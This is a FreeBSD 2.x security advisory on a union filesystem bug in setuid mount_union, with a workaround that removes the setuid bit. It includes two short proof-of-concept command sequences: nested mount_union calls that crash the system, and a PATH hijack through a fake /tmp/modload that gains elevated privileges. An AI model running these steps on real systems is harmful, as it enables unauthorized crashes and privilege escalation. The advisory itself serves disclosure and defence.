

    FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current


    A bug  was found  in the  union file  system code  which can allow
    an  unprivileged  local  user  to  compromise  system   stability.
    This  problem   is  present   in  all   source  code   and  binary
    distributions of FreeBSD version 2.x released before 1996-05-18.

    The union filesystem code had problems with certain mount ordering
    problems. By executing a certain sequence of mount_union commands,
    an unprivileged local user may cause a system reload.

    The  problem  could  allow   local  users  to  compromise   system

    This vulnerability  can only  be exploited  by users  with a valid
    account on the local system.

    to crash system (as a normal user) try this:

        mkdir a
        mkdir b
        mount_union ~/a ~/b
        mount_union -b ~/a ~/b

    to got euid try this:

        export PATH=/tmp:$PATH
        echo /bin/sh >/tmp/modload
        chmod +x /tmp/modload
        mount_union /dir1 /dir2


    The FreeBSD  project is  currently developing  a solution  to this
    problem,  however the proper solution will not be available  until
    a future FreeBSD release.  We do not anticipate releasing  patches
    for previous versions  of FreeBSD due  to the extensive  nature of
    this  fix.   This  security  advisory  will  be  updated  as   new
    information is made available.

    This vulnerability can quickly  and easily be limited  by removing
    the  setuid  permission  bit  from  the mount_union program.  This
    workaround  will  work  for  all  versions  of FreeBSD affected by
    this problem.

    As root, execute the command:

        % chmod u-s /sbin/mount_union

    then verify  that the  setuid permissions  of the  files have been
    removed.   The  permissions  array  should  read  "-r-xr-xr-x"  as
    shown here:

        % ls -l /sbin/mount_union
        -r-xr-xr-x  1 root  bin   53248 Apr 26 04:40 /sbin/mount_union

    In addition to changing  the permissions on the  executable files,
    if you  have the  source code  installed, we  suggest patching the
    sources  so  that  mount_union  will  not  be  installed  with the
    setuid bit set.